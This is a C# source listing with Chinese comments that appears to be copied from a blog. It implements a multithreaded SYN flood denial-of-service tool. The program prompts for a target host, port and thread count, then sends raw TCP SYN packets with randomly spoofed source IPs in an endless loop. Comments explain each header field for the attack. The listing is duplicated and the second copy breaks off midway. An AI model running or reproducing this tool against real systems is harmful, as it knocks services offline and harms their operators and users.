1
//
在工程属性中设置“允许不安全代码”为true
2
3 using System;
4 using System.Net;
5 using System.Net.Sockets;
6 using System.Threading;
7 // 需要的命名空间不用解释了吧
8 namespace syn
9 {
10 public struct ipHeader
11 {
12
13
14
15 public byte ip_verlen; // 4位首部长度+4位IP版本号
16 public byte ip_tos; // 8位服务类型TOS
17 public ushort ip_totallength; // 16位数据包总长度(字节)
18
19
20 public ushort ip_id; // 16位标识
21 public ushort ip_offset; // 3位标志位
22 public byte ip_ttl; // 8位生存时间 TTL
23 public byte ip_protocol; // 8位协议(TCP, UDP, ICMP, Etc.)
24 public ushort ip_checksum; // 16位IP首部校验和
25 public uint ip_srcaddr; // 32位源IP地址
26 public uint ip_destaddr; // 32位目的IP地址
27 }
28 public struct psdHeader
29 {
30
31
32 public uint saddr; // 源地址
33 public uint daddr; // 目的地址
34 public byte mbz;
35 public byte ptcl; // 协议类型
36 public ushort tcpl; // TCP长度
37 }
38 public struct tcpHeader
39 {
40
41 public ushort th_sport; // 16位源端口
42 public ushort th_dport; // 16位目的端口
43 public int th_seq; // 32位序列号
44
45
46 public uint th_ack; // 32位确认号
47 public byte th_lenres; // 4位首部长度/6位保留字
48 public byte th_flag; // 6位标志位
49
50 public ushort th_win; // 16位窗口大小
51 public ushort th_sum; // 16位校验和
52 public ushort th_urp; // 16位紧急数据偏移量
53
54
55 }
56 // 这3个是ip首部tcp伪首部tcp首部的定义。
57 public class syn
58 {
59 private uint ip;
60 private ushort port;
61 private EndPoint ep;
62 private Random rand;
63 private Socket sock;
64 private ipHeader iph;
65 private psdHeader psh;
66 private tcpHeader tch;
67 public UInt16 checksum(UInt16[] buffer, int size)
68 {
69
70 Int32 cksum = 0 ;
71 int counter;
72 counter = 0 ;
73
74 while (size > 0 )
75 {
76 UInt16 val = buffer[counter];
77
78 cksum += Convert.ToInt32(buffer[counter]);
79 counter += 1 ;
80 size -= 1 ;
81 }
82
83 cksum = (cksum >> 16 ) + (cksum & 0xffff );
84 cksum += (cksum >> 16 );
85 return (UInt16)( ~ cksum);
86 }
87 // 这个使用来计算校验码的我照抄c#实现ping那文章的方法,反正ip协议计算校验码方法都一样
88 public syn( uint _ip, ushort _port, EndPoint _ep, Random _rand)
89 {
90 ip = _ip;
91 port = _port;
92 ep = _ep;
93 rand = _rand;
94 ipHeader iph = new ipHeader();
95 psh = new psdHeader();
96 tch = new tcpHeader();
97 sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
98 sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1 );
99 // 这2个挺重要,必须这样才可以自己提供ip头
100 }
101 // 传参数的多线程需要用到代构造函数的对象。
102 static void Main( string [] args)
103 {
104 Console.WriteLine( " 1、输入攻击ip或域名 " );
105 try
106 {
107
108
109
110 IPHostEntry pe = Dns.GetHostByName(Console.ReadLine());
111 uint ip = Convert.ToUInt32(pe.AddressList[ 0 ].Address); // 这是要攻击的ip并转为网络字节序
112 Console.WriteLine( " 2、输入攻击端口 " );
113 ushort port = ushort .Parse(Console.ReadLine());
114
115
116
117 IPEndPoint ep = new IPEndPoint(pe.AddressList[ 0 ], port);
118 byte [] bt = BitConverter.GetBytes(port);
119 Array.Reverse(bt);
120 port = BitConverter.ToUInt16(bt, 0 );
121 // 要攻击的端口也得转为网络字节序,必须是16位0-65535,如果用hosttonetworkorder就转成32位的了,无奈这样
122 Console.WriteLine( " 3、输入攻击线程,最多50个 " );
123 int xiancheng = Int32.Parse(Console.ReadLine());
124 if (xiancheng < 1 || xiancheng > 50 )
125 {
126
127
128
129 Console.WriteLine( " 必须在1到50之间 " );
130 return ;
131 }
132 Random rand = new Random();
133 Thread[] t = new Thread[xiancheng];
134 syn[] sy = new syn[xiancheng];
135 for ( int i = 0 ; i < xiancheng; i ++ )
136 {
137
138
139 sy[i] = new syn(ip, port, ep, rand);
140 t[i] = new Thread( new ThreadStart(sy[i].synFS));
141 t[i].Start();
142 }
143 // 一个线程对应一个对象,不知多个线程对应同一个对象行不行,请指点。基础不行啊
144 }
145 catch
146 {
147
148 Console.WriteLine( " 有错误,请检查是不是连在网上,或者输入是否都正确 " );
149 return ;
150 }
151
152
153 }
154 unsafe public void synFS()
155 {
156 iph.ip_verlen = ( byte )( 4 << 4 | sizeof (ipHeader) / sizeof ( uint ));
157 // ipv4,20字节ip头,这个固定就是69
158
159
160 iph.ip_tos = 0 ;
161 // 这个0就行了
162 iph.ip_totallength = 0x2800 ;
163 // 这个是ip头+tcp头总长,40是最小长度,不带tcp option,应该是0028但是还是网络字节序所以倒过来成了2800
164
165
166 iph.ip_id = 0x9B18 ;
167 // 这个我是拦截ie发送。直接添上来了
168 iph.ip_offset = 0x40 ;
169 // 这个也是拦截ie的
170 iph.ip_ttl = 64 ;
171 // 也是拦截ie的,也可以是128什么的。
172 iph.ip_protocol = 6 ;
173 // 6就是tcp协议
174 iph.ip_checksum = UInt16.Parse( " 0 " );
175
176
177 // 没计算之前都写0
178 iph.ip_destaddr = ip;
179 // ip头的目标地址就是要攻击的地址,上面传过来的。
180 psh.daddr = iph.ip_destaddr;
181 // 伪tcp首部用于校验的,上面是目的地址,和ip的那个一样。
182
183
184
185 psh.mbz = 0 ;
186 // 这个据说0就行
187 psh.ptcl = 6 ;
188 // 6是tcp协议
189 psh.tcpl = 0x1400 ;
190 // tcp首部的大小,20字节,应该是0014,还是字节序原因成了1400
191 tch.th_dport = port;
192 // 攻击端口号,上面传过来的
193 tch.th_ack = 0 ;
194 // 第一次发送所以没有服务器返回的序列号,为0
195 tch.th_lenres = ( byte )(( sizeof (tcpHeader) / 4 << 4 | 0 ));
196 // tcp长度
197 tch.th_flag = 2 ;
198 // 2就是syn
199 tch.th_win = ushort .Parse( " 16614 " );
200 // 拦截ie的
201 tch.th_sum = UInt16.Parse( " 0 " );
202 // 没计算之前都为0
203 tch.th_urp = UInt16.Parse( " 0 " );
204 // 这个连ip都是0,新的攻击方法有改这个值的
205 while ( true )
206
207
208
209 {
210
211
212
213 iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(rand.Next( 1 , 255 ) + " . " + rand.Next( 1 , 255 ) + " . " + rand.Next( 1 , 255 ) + " . " + rand.Next( 1 , 255 )).Address);
214
215
216 psh.saddr = iph.ip_srcaddr;
217 ushort duankou = Convert.ToUInt16(rand.Next( 1 , 65535 ));
218 byte [] bt = BitConverter.GetBytes(duankou);
219 Array.Reverse(bt);
220 tch.th_sport = BitConverter.ToUInt16(bt, 0 );
221 tch.th_seq = IPAddress.HostToNetworkOrder(( int )rand.Next( - 2147483646 , 2147483646 ));
222 // 上面用随机种子随机产生源ip源端口和tcp序列号并转为网络字节序
223
224 iph.ip_checksum = 0 ;
225
226
227 tch.th_sum = 0 ;
228 // 因为循环中,所以每次必须把这2个已有数的清0才可计算
229 byte [] psh_buf = new byte [ sizeof (psdHeader)];
230 Int32 index = 0 ;
231
232
233
234 index = pshto(psh, psh_buf, sizeof (psdHeader));
235 if (index == - 1 )
236 {
237
238
239
240 Console.WriteLine( " 构造tcp伪首部错误 " );
241 return ;
242 }
243 index = 0 ;
244 byte [] tch_buf = new byte [ sizeof (tcpHeader)];
245
246
247 index = tchto(tch, tch_buf, sizeof (tcpHeader));
248 if (index == - 1 )
249 {
250
251
252 Console.WriteLine( " 构造tcp首部错误1 " );
253 return ;
254 }
255 index = 0 ;
256 byte [] tcphe = new byte [ sizeof (psdHeader) + sizeof (tcpHeader)];
257
258 Array.Copy(psh_buf, 0 , tcphe, index, psh_buf.Length);
259 index += psh_buf.Length;
260 Array.Copy(tch_buf, 0 , tcphe, index, tch_buf.Length);
261 index += tch_buf.Length;
262 tch.th_sum = chec(tcphe, index);
263 index = 0 ;
264
265
266
267 index = tchto(tch, tch_buf, sizeof (tcpHeader));
268 if (index == - 1 )
269 {
270
271
272
273 Console.WriteLine( " 构造tcp首部错误2 " );
274 return ;
275 }
276 index = 0 ;
277 byte [] ip_buf = new byte [ sizeof (ipHeader)];
278
279
280
281 index = ipto(iph, ip_buf, sizeof (ipHeader));
282 if (index == - 1 )
283 {
284
285
286
287 Console.WriteLine( " 构造ip首部错误1 " );
288 return ;
289 }
290 index = 0 ;
291 byte [] iptcp = new byte [ sizeof (ipHeader) + sizeof (tcpHeader)];
292
293
294 Array.Copy(ip_buf, 0 , iptcp, index, ip_buf.Length);
295 index += ip_buf.Length;
296 Array.Copy(tch_buf, 0 , iptcp, index, tch_buf.Length);
297 index += tch_buf.Length;
298 iph.ip_checksum = chec(iptcp, index);
299 index = 0 ;
300
301
302
303 index = ipto(iph, ip_buf, sizeof (tcpHeader));
304 if (index == - 1 )
305 {
306
307
308 Console.WriteLine( " 构造ip首部错误2 " );
309 return ;
310 }
311 index = 0 ;
312 Array.Copy(ip_buf, 0 , iptcp, index, ip_buf.Length);
313 index += ip_buf.Length;
314
315
316 Array.Copy(tch_buf, 0 , iptcp, index, tch_buf.Length);
317 index += tch_buf.Length;
318 if (iptcp.Length != ( sizeof (ipHeader) + sizeof (tcpHeader)))
319 {
320
321
322
323 Console.WriteLine( " 构造iptcp报文错误 " );
324 return ;
325 }
326 // 上面这一大堆东西就是计算校验和的方法了,方法是
327 // 1、建立一个字节数组,前面放tcp伪首部后面放tcp首部,然后计算,确定最终tcp部分的校验和
328 // 2、把确定了校验和地tcp首部重新生成字节数组,这是就不加tcp伪首部了,所以工20字节
329 // 3、建40字节字节数组,前面放ip首部,后面放tcp首部,校验,确定最终ip部分校验和
330 // 4、最后把确定了ip校验和的ip部分和tcp部分先后放入40字节的字节数组中,就是要发送的buffer[]了,就是这么麻烦
331 try
332 {
333
334 sock.SendTo(iptcp, ep);
335 // 构造发送字节数组总是麻烦,发送就简单了,socket.sendto就可以了
336
337 }
338 catch
339 {
340 Console.WriteLine( " 发送错误 " );
341 return ;
342 }
343
344
345 }
346
347 }
348 public UInt16 chec( byte [] buffer, int size)
349 {
350
351
352
353 Double double_length = Convert.ToDouble(size);
354 Double dtemp = Math.Ceiling(double_length / 2 );
355 int cksum_buffer_length = Convert.ToInt32(dtemp);
356 UInt16[] cksum_buffer = new UInt16[cksum_buffer_length];
357 int icmp_header_buffer_index = 0 ;
358 for ( int i = 0 ; i < cksum_buffer_length; i ++ )
359 {
360 cksum_buffer[i] =
361 BitConverter.ToUInt16(buffer, icmp_header_buffer_index);
362 icmp_header_buffer_index += 2 ;
363 }
364 UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length);
365 return u_cksum;
366 }
367
368
369 // 这个是计算校验,把那些类型不一样的全转为16位字节数组用的
370 public Int32 ipto(ipHeader iph, byte [] Buffer, int size)
371 {
372 Int32 rtn = 0 ;
373 int index = 0 ;
374 byte [] b_verlen = new byte [ 1 ];
375 b_verlen[ 0 ] = iph.ip_verlen;
376 byte [] b_tos = new byte [ 1 ];
377 b_tos[ 0 ] = iph.ip_tos;
378 byte [] b_totallen = BitConverter.GetBytes(iph.ip_totallength);
379 byte [] b_id = BitConverter.GetBytes(iph.ip_id);
380
381 byte [] b_offset = BitConverter.GetBytes(iph.ip_offset);
382 byte [] b_ttl = new byte [ 1 ];
383 b_ttl[ 0 ] = iph.ip_ttl;
384 byte [] b_protol = new byte [ 1 ];
385 b_protol[ 0 ] = iph.ip_protocol;
386 byte [] b_checksum = BitConverter.GetBytes(iph.ip_checksum);
387 byte [] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr);
388 byte [] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr);
389 Array.Copy(b_verlen, 0 , Buffer, index, b_verlen.Length);
390 index += b_verlen.Length;
391 Array.Copy(b_tos, 0 , Buffer, index, b_tos.Length);
392 index += b_tos.Length;
393 Array.Copy(b_totallen, 0 , Buffer, index, b_totallen.Length);
394 index += b_totallen.Length;
395
396 Array.Copy(b_id, 0 , Buffer, index, b_id.Length);
397 index += b_id.Length;
398 Array.Copy(b_offset, 0 , Buffer, index, b_offset.Length);
399 index += b_offset.Length;
400 Array.Copy(b_ttl, 0 , Buffer, index, b_ttl.Length);
401 index += b_ttl.Length;
402
403
404
405 Array.Copy(b_protol, 0 , Buffer, index, b_protol.Length);
406 index += b_protol.Length;
407 Array.Copy(b_checksum, 0 , Buffer, index, b_checksum.Length);
408 index += b_checksum.Length;
409 Array.Copy(b_srcaddr, 0 , Buffer, index, b_srcaddr.Length);
410 index += b_srcaddr.Length;
411
412
413
414 Array.Copy(b_destaddr, 0 , Buffer, index, b_destaddr.Length);
415 index += b_destaddr.Length;
416 if (index != size /**//* sizeof(IcmpPacket) */ )
417 {
418 rtn = - 1 ;
419 return rtn;
420 }
421
422 rtn = index;
423 return rtn;
424
425 }
426
427
428
429 // 这个是把ip部分转为字节数组用的
430 public Int32 pshto(psdHeader psh, byte [] buffer, int size)
431 {
432 Int32 rtn;
433 int index = 0 ;
434 byte [] b_psh_saddr = BitConverter.GetBytes(psh.saddr);
435 byte [] b_psh_daddr = BitConverter.GetBytes(psh.daddr);
436 byte [] b_psh_mbz = new byte [ 1 ];
437
438
439 b_psh_mbz[ 0 ] = psh.mbz;
440 byte [] b_psh_ptcl = new byte [ 1 ];
441 b_psh_ptcl[ 0 ] = psh.ptcl;
442 byte [] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl);
443 Array.Copy(b_psh_saddr, 0 , buffer, index, b_psh_saddr.Length);
444 index += b_psh_saddr.Length;
445 Array.Copy(b_psh_daddr, 0 , buffer, index, b_psh_daddr.Length);
446 index += b_psh_daddr.Length;
447 Array.Copy(b_psh_mbz, 0 , buffer, index, b_psh_mbz.Length);
448 index += b_psh_mbz.Length;
449
450
451
452 Array.Copy(b_psh_ptcl, 0 , buffer, index, b_psh_ptcl.Length);
453 index += b_psh_ptcl.Length;
454 Array.Copy(b_psh_tcpl, 0 , buffer, index, b_psh_tcpl.Length);
455 index += b_psh_tcpl.Length;
456 if (index != size)
457 {
458 rtn = - 1 ;
459 return rtn;
460 }
461 else
462 {
463
464
465 rtn = index;
466 return rtn;
467 }
468
469 }
470 // 这个是把tcp伪首部转为字节数组用的
471 public Int32 tchto(tcpHeader tch, byte [] buffer, int size)
472 {
473 Int32 rtn;
474 int index = 0 ;
475 byte [] b_tch_sport = BitConverter.GetBytes(tch.th_sport);
476 byte [] b_tch_dport = BitConverter.GetBytes(tch.th_dport);
477 byte [] b_tch_seq = BitConverter.GetBytes(tch.th_seq);
478 byte [] b_tch_ack = BitConverter.GetBytes(tch.th_ack);
479 byte [] b_tch_lenres = new byte [ 1 ];
480 b_tch_lenres[ 0 ] = tch.th_lenres;
481 byte [] b_tch_flag = new byte [ 1 ];
482 b_tch_flag[ 0 ] = tch.th_flag;
483 byte [] b_tch_win = BitConverter.GetBytes(tch.th_win);
484 byte [] b_tch_sum = BitConverter.GetBytes(tch.th_sum);
485 byte [] b_tch_urp = BitConverter.GetBytes(tch.th_urp);
486
487
488 Array.Copy(b_tch_sport, 0 , buffer, index, b_tch_sport.Length);
489 index += b_tch_sport.Length;
490 Array.Copy(b_tch_dport, 0 , buffer, index, b_tch_dport.Length);
491 index += b_tch_dport.Length;
492 Array.Copy(b_tch_seq, 0 , buffer, index, b_tch_seq.Length);
493 index += b_tch_seq.Length;
494
495
496
497 Array.Copy(b_tch_ack, 0 , buffer, index, b_tch_ack.Length);
498 index += b_tch_ack.Length;
499 Array.Copy(b_tch_lenres, 0 , buffer, index, b_tch_lenres.Length);
500 index += b_tch_lenres.Length;
501 Array.Copy(b_tch_flag, 0 , buffer, index, b_tch_flag.Length);
502 index += b_tch_flag.Length;
503
504 Array.Copy(b_tch_win, 0 , buffer, index, b_tch_win.Length);
505 index += b_tch_win.Length;
506 Array.Copy(b_tch_sum, 0 , buffer, index, b_tch_sum.Length);
507 index += b_tch_sum.Length;
508 Array.Copy(b_tch_urp, 0 , buffer, index, b_tch_urp.Length);
509 index += b_tch_urp.Length;
510 if (index != size)
511 {
512
513
514 rtn = - 1 ;
515 return rtn;
516 }
517 else
518 {
519
520 rtn = index;
521 return rtn;
522 }
523 }
524 // 这个是把tcp部分转为字节数组用的,因为这个要用到2次就不把这个和伪首部放一块了。
525 }
526 }
527
528
529 // 最后,本代码校验部分的方法参考了用c#实现ping程序的文章
530
2
3 using System;
4 using System.Net;
5 using System.Net.Sockets;
6 using System.Threading;
7 // 需要的命名空间不用解释了吧
8 namespace syn
9 {
10 public struct ipHeader
11 {
12
13
14
15 public byte ip_verlen; // 4位首部长度+4位IP版本号
16 public byte ip_tos; // 8位服务类型TOS
17 public ushort ip_totallength; // 16位数据包总长度(字节)
18
19
20 public ushort ip_id; // 16位标识
21 public ushort ip_offset; // 3位标志位
22 public byte ip_ttl; // 8位生存时间 TTL
23 public byte ip_protocol; // 8位协议(TCP, UDP, ICMP, Etc.)
24 public ushort ip_checksum; // 16位IP首部校验和
25 public uint ip_srcaddr; // 32位源IP地址
26 public uint ip_destaddr; // 32位目的IP地址
27 }
28 public struct psdHeader
29 {
30
31
32 public uint saddr; // 源地址
33 public uint daddr; // 目的地址
34 public byte mbz;
35 public byte ptcl; // 协议类型
36 public ushort tcpl; // TCP长度
37 }
38 public struct tcpHeader
39 {
40
41 public ushort th_sport; // 16位源端口
42 public ushort th_dport; // 16位目的端口
43 public int th_seq; // 32位序列号
44
45
46 public uint th_ack; // 32位确认号
47 public byte th_lenres; // 4位首部长度/6位保留字
48 public byte th_flag; // 6位标志位
49
50 public ushort th_win; // 16位窗口大小
51 public ushort th_sum; // 16位校验和
52 public ushort th_urp; // 16位紧急数据偏移量
53
54
55 }
56 // 这3个是ip首部tcp伪首部tcp首部的定义。
57 public class syn
58 {
59 private uint ip;
60 private ushort port;
61 private EndPoint ep;
62 private Random rand;
63 private Socket sock;
64 private ipHeader iph;
65 private psdHeader psh;
66 private tcpHeader tch;
67 public UInt16 checksum(UInt16[] buffer, int size)
68 {
69
70 Int32 cksum = 0 ;
71 int counter;
72 counter = 0 ;
73
74 while (size > 0 )
75 {
76 UInt16 val = buffer[counter];
77
78 cksum += Convert.ToInt32(buffer[counter]);
79 counter += 1 ;
80 size -= 1 ;
81 }
82
83 cksum = (cksum >> 16 ) + (cksum & 0xffff );
84 cksum += (cksum >> 16 );
85 return (UInt16)( ~ cksum);
86 }
87 // 这个使用来计算校验码的我照抄c#实现ping那文章的方法,反正ip协议计算校验码方法都一样
88 public syn( uint _ip, ushort _port, EndPoint _ep, Random _rand)
89 {
90 ip = _ip;
91 port = _port;
92 ep = _ep;
93 rand = _rand;
94 ipHeader iph = new ipHeader();
95 psh = new psdHeader();
96 tch = new tcpHeader();
97 sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
98 sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1 );
99 // 这2个挺重要,必须这样才可以自己提供ip头
100 }
101 // 传参数的多线程需要用到代构造函数的对象。
102 static void Main( string [] args)
103 {
104 Console.WriteLine( " 1、输入攻击ip或域名 " );
105 try
106 {
107
108
109
110 IPHostEntry pe = Dns.GetHostByName(Console.ReadLine());
111 uint ip = Convert.ToUInt32(pe.AddressList[ 0 ].Address); // 这是要攻击的ip并转为网络字节序
112 Console.WriteLine( " 2、输入攻击端口 " );
113 ushort port = ushort .Parse(Console.ReadLine());
114
115
116
117 IPEndPoint ep = new IPEndPoint(pe.AddressList[ 0 ], port);
118 byte [] bt = BitConverter.GetBytes(port);
119 Array.Reverse(bt);
120 port = BitConverter.ToUInt16(bt, 0 );
121 // 要攻击的端口也得转为网络字节序,必须是16位0-65535,如果用hosttonetworkorder就转成32位的了,无奈这样
122 Console.WriteLine( " 3、输入攻击线程,最多50个 " );
123 int xiancheng = Int32.Parse(Console.ReadLine());
124 if (xiancheng < 1 || xiancheng > 50 )
125 {
126
127
128
129 Console.WriteLine( " 必须在1到50之间 " );
130 return ;
131 }
132 Random rand = new Random();
133 Thread[] t = new Thread[xiancheng];
134 syn[] sy = new syn[xiancheng];
135 for ( int i = 0 ; i < xiancheng; i ++ )
136 {
137
138
139 sy[i] = new syn(ip, port, ep, rand);
140 t[i] = new Thread( new ThreadStart(sy[i].synFS));
141 t[i].Start();
142 }
143 // 一个线程对应一个对象,不知多个线程对应同一个对象行不行,请指点。基础不行啊
144 }
145 catch
146 {
147
148 Console.WriteLine( " 有错误,请检查是不是连在网上,或者输入是否都正确 " );
149 return ;
150 }
151
152
153 }
154 unsafe public void synFS()
155 {
156 iph.ip_verlen = ( byte )( 4 << 4 | sizeof (ipHeader) / sizeof ( uint ));
157 // ipv4,20字节ip头,这个固定就是69
158
159
160 iph.ip_tos = 0 ;
161 // 这个0就行了
162 iph.ip_totallength = 0x2800 ;
163 // 这个是ip头+tcp头总长,40是最小长度,不带tcp option,应该是0028但是还是网络字节序所以倒过来成了2800
164
165
166 iph.ip_id = 0x9B18 ;
167 // 这个我是拦截ie发送。直接添上来了
168 iph.ip_offset = 0x40 ;
169 // 这个也是拦截ie的
170 iph.ip_ttl = 64 ;
171 // 也是拦截ie的,也可以是128什么的。
172 iph.ip_protocol = 6 ;
173 // 6就是tcp协议
174 iph.ip_checksum = UInt16.Parse( " 0 " );
175
176
177 // 没计算之前都写0
178 iph.ip_destaddr = ip;
179 // ip头的目标地址就是要攻击的地址,上面传过来的。
180 psh.daddr = iph.ip_destaddr;
181 // 伪tcp首部用于校验的,上面是目的地址,和ip的那个一样。
182
183
184
185 psh.mbz = 0 ;
186 // 这个据说0就行
187 psh.ptcl = 6 ;
188 // 6是tcp协议
189 psh.tcpl = 0x1400 ;
190 // tcp首部的大小,20字节,应该是0014,还是字节序原因成了1400
191 tch.th_dport = port;
192 // 攻击端口号,上面传过来的
193 tch.th_ack = 0 ;
194 // 第一次发送所以没有服务器返回的序列号,为0
195 tch.th_lenres = ( byte )(( sizeof (tcpHeader) / 4 << 4 | 0 ));
196 // tcp长度
197 tch.th_flag = 2 ;
198 // 2就是syn
199 tch.th_win = ushort .Parse( " 16614 " );
200 // 拦截ie的
201 tch.th_sum = UInt16.Parse( " 0 " );
202 // 没计算之前都为0
203 tch.th_urp = UInt16.Parse( " 0 " );
204 // 这个连ip都是0,新的攻击方法有改这个值的
205 while ( true )
206
207
208
209 {
210
211
212
213 iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(rand.Next( 1 , 255 ) + " . " + rand.Next( 1 , 255 ) + " . " + rand.Next( 1 , 255 ) + " . " + rand.Next( 1 , 255 )).Address);
214
215
216 psh.saddr = iph.ip_srcaddr;
217 ushort duankou = Convert.ToUInt16(rand.Next( 1 , 65535 ));
218 byte [] bt = BitConverter.GetBytes(duankou);
219 Array.Reverse(bt);
220 tch.th_sport = BitConverter.ToUInt16(bt, 0 );
221 tch.th_seq = IPAddress.HostToNetworkOrder(( int )rand.Next( - 2147483646 , 2147483646 ));
222 // 上面用随机种子随机产生源ip源端口和tcp序列号并转为网络字节序
223
224 iph.ip_checksum = 0 ;
225
226
227 tch.th_sum = 0 ;
228 // 因为循环中,所以每次必须把这2个已有数的清0才可计算
229 byte [] psh_buf = new byte [ sizeof (psdHeader)];
230 Int32 index = 0 ;
231
232
233
234 index = pshto(psh, psh_buf, sizeof (psdHeader));
235 if (index == - 1 )
236 {
237
238
239
240 Console.WriteLine( " 构造tcp伪首部错误 " );
241 return ;
242 }
243 index = 0 ;
244 byte [] tch_buf = new byte [ sizeof (tcpHeader)];
245
246
247 index = tchto(tch, tch_buf, sizeof (tcpHeader));
248 if (index == - 1 )
249 {
250
251
252 Console.WriteLine( " 构造tcp首部错误1 " );
253 return ;
254 }
255 index = 0 ;
256 byte [] tcphe = new byte [ sizeof (psdHeader) + sizeof (tcpHeader)];
257
258 Array.Copy(psh_buf, 0 , tcphe, index, psh_buf.Length);
259 index += psh_buf.Length;
260 Array.Copy(tch_buf, 0 , tcphe, index, tch_buf.Length);
261 index += tch_buf.Length;
262 tch.th_sum = chec(tcphe, index);
263 index = 0 ;
264
265
266
267 index = tchto(tch, tch_buf, sizeof (tcpHeader));
268 if (index == - 1 )
269 {
270
271
272
273 Console.WriteLine( " 构造tcp首部错误2 " );
274 return ;
275 }
276 index = 0 ;
277 byte [] ip_buf = new byte [ sizeof (ipHeader)];
278
279
280
281 index = ipto(iph, ip_buf, sizeof (ipHeader));
282 if (index == - 1 )
283 {
284
285
286
287 Console.WriteLine( " 构造ip首部错误1 " );
288 return ;
289 }
290 index = 0 ;
291 byte [] iptcp = new byte [ sizeof (ipHeader) + sizeof (tcpHeader)];
292
293
294 Array.Copy(ip_buf, 0 , iptcp, index, ip_buf.Length);
295 index += ip_buf.Length;
296 Array.Copy(tch_buf, 0 , iptcp, index, tch_buf.Length);
297 index += tch_buf.Length;
298 iph.ip_checksum = chec(iptcp, index);
299 index = 0 ;
300
301
302
303 index = ipto(iph, ip_buf, sizeof (tcpHeader));
304 if (index == - 1 )
305 {
306
307
308 Console.WriteLine( " 构造ip首部错误2 " );
309 return ;
310 }
311 index = 0 ;
312 Array.Copy(ip_buf, 0 , iptcp, index, ip_buf.Length);
313 index += ip_buf.Length;
314
315
316 Array.Copy(tch_buf, 0 , iptcp, index, tch_buf.Length);
317 index += tch_buf.Length;
318 if (iptcp.Length != ( sizeof (ipHeader) + sizeof (tcpHeader)))
319 {
320
321
322
323 Console.WriteLine( " 构造iptcp报文错误 " );
324 return ;
325 }
326 // 上面这一大堆东西就是计算校验和的方法了,方法是
327 // 1、建立一个字节数组,前面放tcp伪首部后面放tcp首部,然后计算,确定最终tcp部分的校验和
328 // 2、把确定了校验和地tcp首部重新生成字节数组,这是就不加tcp伪首部了,所以工20字节
329 // 3、建40字节字节数组,前面放ip首部,后面放tcp首部,校验,确定最终ip部分校验和
330 // 4、最后把确定了ip校验和的ip部分和tcp部分先后放入40字节的字节数组中,就是要发送的buffer[]了,就是这么麻烦
331 try
332 {
333
334 sock.SendTo(iptcp, ep);
335 // 构造发送字节数组总是麻烦,发送就简单了,socket.sendto就可以了
336
337 }
338 catch
339 {
340 Console.WriteLine( " 发送错误 " );
341 return ;
342 }
343
344
345 }
346
347 }
348 public UInt16 chec( byte [] buffer, int size)
349 {
350
351
352
353 Double double_length = Convert.ToDouble(size);
354 Double dtemp = Math.Ceiling(double_length / 2 );
355 int cksum_buffer_length = Convert.ToInt32(dtemp);
356 UInt16[] cksum_buffer = new UInt16[cksum_buffer_length];
357 int icmp_header_buffer_index = 0 ;
358 for ( int i = 0 ; i < cksum_buffer_length; i ++ )
359 {
360 cksum_buffer[i] =
361 BitConverter.ToUInt16(buffer, icmp_header_buffer_index);
362 icmp_header_buffer_index += 2 ;
363 }
364 UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length);
365 return u_cksum;
366 }
367
368
369 // 这个是计算校验,把那些类型不一样的全转为16位字节数组用的
370 public Int32 ipto(ipHeader iph, byte [] Buffer, int size)
371 {
372 Int32 rtn = 0 ;
373 int index = 0 ;
374 byte [] b_verlen = new byte [ 1 ];
375 b_verlen[ 0 ] = iph.ip_verlen;
376 byte [] b_tos = new byte [ 1 ];
377 b_tos[ 0 ] = iph.ip_tos;
378 byte [] b_totallen = BitConverter.GetBytes(iph.ip_totallength);
379 byte [] b_id = BitConverter.GetBytes(iph.ip_id);
380
381 byte [] b_offset = BitConverter.GetBytes(iph.ip_offset);
382 byte [] b_ttl = new byte [ 1 ];
383 b_ttl[ 0 ] = iph.ip_ttl;
384 byte [] b_protol = new byte [ 1 ];
385 b_protol[ 0 ] = iph.ip_protocol;
386 byte [] b_checksum = BitConverter.GetBytes(iph.ip_checksum);
387 byte [] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr);
388 byte [] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr);
389 Array.Copy(b_verlen, 0 , Buffer, index, b_verlen.Length);
390 index += b_verlen.Length;
391 Array.Copy(b_tos, 0 , Buffer, index, b_tos.Length);
392 index += b_tos.Length;
393 Array.Copy(b_totallen, 0 , Buffer, index, b_totallen.Length);
394 index += b_totallen.Length;
395
396 Array.Copy(b_id, 0 , Buffer, index, b_id.Length);
397 index += b_id.Length;
398 Array.Copy(b_offset, 0 , Buffer, index, b_offset.Length);
399 index += b_offset.Length;
400 Array.Copy(b_ttl, 0 , Buffer, index, b_ttl.Length);
401 index += b_ttl.Length;
402
403
404
405 Array.Copy(b_protol, 0 , Buffer, index, b_protol.Length);
406 index += b_protol.Length;
407 Array.Copy(b_checksum, 0 , Buffer, index, b_checksum.Length);
408 index += b_checksum.Length;
409 Array.Copy(b_srcaddr, 0 , Buffer, index, b_srcaddr.Length);
410 index += b_srcaddr.Length;
411
412
413
414 Array.Copy(b_destaddr, 0 , Buffer, index, b_destaddr.Length);
415 index += b_destaddr.Length;
416 if (index != size /**//* sizeof(IcmpPacket) */ )
417 {
418 rtn = - 1 ;
419 return rtn;
420 }
421
422 rtn = index;
423 return rtn;
424
425 }
426
427
428
429 // 这个是把ip部分转为字节数组用的
430 public Int32 pshto(psdHeader psh, byte [] buffer, int size)
431 {
432 Int32 rtn;
433 int index = 0 ;
434 byte [] b_psh_saddr = BitConverter.GetBytes(psh.saddr);
435 byte [] b_psh_daddr = BitConverter.GetBytes(psh.daddr);
436 byte [] b_psh_mbz = new byte [ 1 ];
437
438
439 b_psh_mbz[ 0 ] = psh.mbz;
440 byte [] b_psh_ptcl = new byte [ 1 ];
441 b_psh_ptcl[ 0 ] = psh.ptcl;
442 byte [] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl);
443 Array.Copy(b_psh_saddr, 0 , buffer, index, b_psh_saddr.Length);
444 index += b_psh_saddr.Length;
445 Array.Copy(b_psh_daddr, 0 , buffer, index, b_psh_daddr.Length);
446 index += b_psh_daddr.Length;
